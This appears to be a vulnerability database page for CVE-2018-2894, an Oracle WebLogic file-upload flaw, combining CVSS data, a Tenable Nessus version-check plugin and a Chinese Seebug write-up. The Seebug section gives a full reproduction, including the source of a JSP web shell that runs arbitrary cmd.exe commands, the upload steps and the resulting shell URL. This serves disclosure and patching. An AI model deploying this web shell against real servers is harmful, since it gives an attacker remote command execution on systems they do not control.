Vulnerabilities > CVE-2018-2894 - Unspecified vulnerability in Oracle Weblogic Server

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
oracle
nessus

Summary

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS - Web Services). Supported versions that are affected are 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

D2sec

nameOracle WebLogic Server WLS File Upload
urlhttp://www.d2sec.com/exploits/oracle_weblogic_server_wls_file_upload.html

Nessus

NASL familyMisc.
NASL idORACLE_WEBLOGIC_SERVER_CPU_JUL_2018.NASL
descriptionThe version of Oracle WebLogic Server installed on the remote host is affected by multiple vulnerabilities: - An unspecified vulnerability in the Spring Framework (Sample Apps) subcomponent in Oracle WebLogic allows an unauthenticated, remote attacker to takeover a WebLogic server. (CVE-2018-1275) - An unspecified vulnerability in the WLS Core Components subcomponent in Oracle WebLogic allows an unauthenticated, remote attacker to takeover a WebLogic server. (CVE-2018-2893) - An unspecified vulnerability in the WLS - Web Services subcomponent in Oracle WebLogic allows an unauthenticated, remote attacker with HTTP access to compromise and takeover a WebLogic server. (CVE-2018-2894) In addition, Oracle WebLogic Server is affected by several other lower scoring vulnerabilities in the WLS Core Components, JSF, SAML, and Console (jackson-databind) subcomponents. Note that Nessus has not tested for these issues but has instead relied only on the application
last seen2020-06-01
modified2020-06-02
plugin id111209
published2018-07-20
reporterThis script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
sourcehttps://www.tenable.com/plugins/nessus/111209
titleOracle WebLogic Server Multiple Vulnerabilities (July 2018 CPU)
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(111209);
  script_version("1.15");
  script_cvs_date("Date: 2019/04/30 14:00:04");

  script_cve_id(
    "CVE-2018-1275",
    "CVE-2018-2893",
    "CVE-2018-2894",
    "CVE-2018-2933",
    "CVE-2018-2935",
    "CVE-2018-2987",
    "CVE-2018-2998",
    "CVE-2018-7489"
  );
  script_bugtraq_id(
    103771,
    103203,
    104817
  );

  script_name(english:"Oracle WebLogic Server Multiple Vulnerabilities (July 2018 CPU)");
  script_summary(english:"Checks for the patch.");

  script_set_attribute(attribute:"synopsis", value:
"An application server installed on the remote host is affected by
multiple vulnerabilities.");
  script_set_attribute(attribute:"description", value:
"The version of Oracle WebLogic Server installed on the remote host is
affected by multiple vulnerabilities:

  - An unspecified vulnerability in the Spring Framework
    (Sample Apps) subcomponent in Oracle WebLogic allows
    an unauthenticated, remote attacker to takeover a
    WebLogic server. (CVE-2018-1275)

  - An unspecified vulnerability in the WLS Core Components
    subcomponent in Oracle WebLogic allows an
    unauthenticated, remote attacker to takeover a
    WebLogic server. (CVE-2018-2893)

  - An unspecified vulnerability in the WLS - Web Services
    subcomponent in Oracle WebLogic allows an
    unauthenticated, remote attacker with HTTP access to
    compromise and takeover a WebLogic server.
    (CVE-2018-2894)

In addition, Oracle WebLogic Server is affected by several other lower
scoring vulnerabilities in the WLS Core Components, JSF, SAML, and 
Console (jackson-databind) subcomponents.

Note that Nessus has not tested for these issues but has instead
relied only on the application's self-reported version number."
  );
  # http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?50f36723");
  script_set_attribute(attribute:"solution", value:
"Apply the appropriate patch according to the July 2018 Oracle
Critical Patch Update advisory.

Refer to Oracle for any additional patch instructions or
mitigation options.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2018-1275");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"d2_elliot_name", value:"Oracle WebLogic Server WLS File Upload");
  script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:'CANVAS');

  script_set_attribute(attribute:"vuln_publication_date", value:"2018/07/17");
  script_set_attribute(attribute:"patch_publication_date", value:"2018/07/17");
  script_set_attribute(attribute:"plugin_publication_date", value:"2018/07/20");

  script_set_attribute(attribute:"agent", value:"all");
  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:fusion_middleware");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:weblogic_server");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Misc.");

  script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("oracle_weblogic_server_installed.nbin", "os_fingerprint.nasl");
  script_require_keys("installed_sw/Oracle WebLogic Server");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("install_func.inc");
include("obj.inc");
include("spad_log_func.inc");

app_name = "Oracle WebLogic Server";

install = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);
ohome = install["Oracle Home"];
subdir = install["path"];
version = install["version"];

fix = NULL;
fix_ver = NULL;

spad_log(message:"checking version [" + version + "]");
# individual security patches
if (version =~ "^12\.2\.1\.3($|[^0-9])")
{
  fix_ver = "12.2.1.3.180717";
  fix = make_list("27912627");
}
else if (version =~ "^12\.2\.1\.2($|[^0-9])")
{
  fix_ver = "12.2.1.2.180717";
  fix = make_list("27741413");
}
else if (version =~ "^12\.1\.3\.")
{
  fix_ver = "12.1.3.0.180717";
  fix = make_list("27919943");
}
else if (version =~ "^10\.3\.6\.")
{
  fix_ver = "10.3.6.0.180717";
  fix = make_list("B47X"); # patchid is obtained from the readme and 10.3.6.x assets are different 
}
else
  audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);

spad_log(message:"checking fix [" + obj_rep(fix) + "]");
PATCHED=FALSE;

# Iterate over the list of patches and check the install for the patchID
foreach id (fix)
{
 spad_log(message:"Checking fix id: [" + id +"]");
 if (install[id])
 {
   PATCHED=TRUE;
   break;
 }
}

VULN=FALSE;
if (ver_compare(ver:version, fix:fix_ver, strict:FALSE) == -1)
  VULN=TRUE;

if (PATCHED || !VULN)
  audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);

os = get_kb_item_or_exit("Host/OS");
if ('windows' >< tolower(os))
{
    port = get_kb_item("SMB/transport");
      if (!port) port = 445;
}
else port = 0;

report =
  '\n  Oracle Home    : ' + ohome +
  '\n  Install path   : ' + subdir +
  '\n  Version        : ' + version +
  '\n  Fixes          : ' + join(sep:", ", fix);

security_report_v4(extra:report, severity:SECURITY_HOLE, port:port);

Seebug

bulletinFamilyexploit
description漏洞影响版本:10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3 下载地址:http://download.oracle.com/otn/nt/middleware/12c/12213/fmw_12.2.1.3.0_wls_quick_Disk1_1of1.zip ### 漏洞复现 服务启动后,访问 http://localhost:7001/ws_utc/config.do ![](https://images.seebug.org/1531998939378) 可以将当前的工作目录为更改为其他目录。以本地环境为例,可以部署到 ``` C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\com.oracle.webservices.wls.ws-testclient-app-wls\4mcj4y\war``` 选择右边的安全栏目,添加JKS Keystores上传文件。假设chybeta.jsp内容如下: ``` <%@ page import="java.util.*,java.io.*,java.net.*"%> <HTML><BODY> <FORM METHOD="POST" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="cmd"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "\n<BR>"); Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> </pre> </BODY></HTML> ``` 抓包获取到时间戳为`1531987145013`,则上传到的位置即`config\keystore\1531987145013_chybeta.jsp` ![](https://images.seebug.org/1531998985265-w331s) 访问`http://localhost:7001/ws_utc/config/keystore/1531987145013_chybeta.jsp` ### 简要漏洞分析 在ws-testpage-impl.jar!/com/oracle/webservices/testclient/setting/TestClientWorkDirManager.class:59: ``` public void changeWorkDir(String path) { String[] oldPaths = this.getRelatedPaths(); if (this.testPageProvider.getWsImplType() == ImplType.JRF) { this.isWorkDirChangeable = false; this.isWorkDirWritable = isDirWritable(path); this.isWorkDirChangeable = true; this.setTestClientWorkDir(path); } else { this.persistWorkDir(path); this.init(); } if (this.isWorkDirWritable) { String[] newPaths = this.getRelatedPaths(); moveDirs(oldPaths, newPaths); } else { Logger.fine("[INFO] Newly specified TestClient Working Dir is readonly. Won't move the configuration stuff to new path."); } } ``` 此函数用于改变工作目录,但其中并未做任何检测。 在ws-testpage-impl.jar!/com/oracle/webservices/testclient/ws/res/SettingResource.class:181中: ``` @Path("/keystore") @POST @Produces({"application/xml", "application/json"}) @Consumes({"multipart/form-data"}) public Response editKeyStoreSettingByMultiPart(FormDataMultiPart formPartParams) { if (!RequestUtil.isRequstedByAdmin(this.request)) { return Response.status(Status.FORBIDDEN).build(); } else { if (TestClientRT.isVerbose()) { Logger.fine("calling SettingResource.addKeyStoreSettingByMultiPart"); } String currentTimeValue = "" + (new Date()).getTime(); KeyValuesMap<String, String> formParams = RSDataHelper.getInstance().convertFormDataMultiPart(formPartParams, true, TestClientRT.getKeyStorePath(), currentTimeValue); .... } } ``` 跟入ws-testpage-impl.jar!/com/oracle/webservices/testclient/core/ws/cdf/config/parameter/TestClientRT.class:31 ``` public static String getKeyStorePath() { return getConfigDir() + File.separator + "keystore"; } ``` 得到要写入的路径storePath。 在ws-testpage-impl.jar!/com/oracle/webservices/testclient/ws/util/RSDataHelper.class:145: ``` public KeyValuesMap<String, String> convertFormDataMultiPart(FormDataMultiPart formPartParams, boolean isExtactAttachment, String path, String fileNamePrefix) { ... if (attachName != null && attachName.trim().length() > 0) { if (attachName != null && attachName.trim().length() != 0) { attachName = this.refactorAttachName(attachName); if (fileNamePrefix == null) { fileNamePrefix = key; } String filename = (new File(storePath, fileNamePrefix + "_" + attachName)).getAbsolutePath(); kvMap.addValue(key, filename); if (isExtactAttachment) { this.saveAttachedFile(filename, (InputStream)bodyPart.getValueAs(InputStream.class)); } } } ... } ``` 把上传文件的内容传到了storePath目录里,文件名满足fileNamePrefix + "_" + attachName。这过程没有任何过滤和检查:)... 条件: * 需要知道部署应用的web目录 * ws_utc/config.do在开发模式下无需认证,在生产模式下需要认证。具体可见Oracle® Fusion Middleware Administering Web Services
idSSV:97423
last seen2018-07-21
modified2018-07-19
published2018-07-19
reporterMy Seebug
titleWebLogic 任意文件上传漏洞(CVE-2018-2894)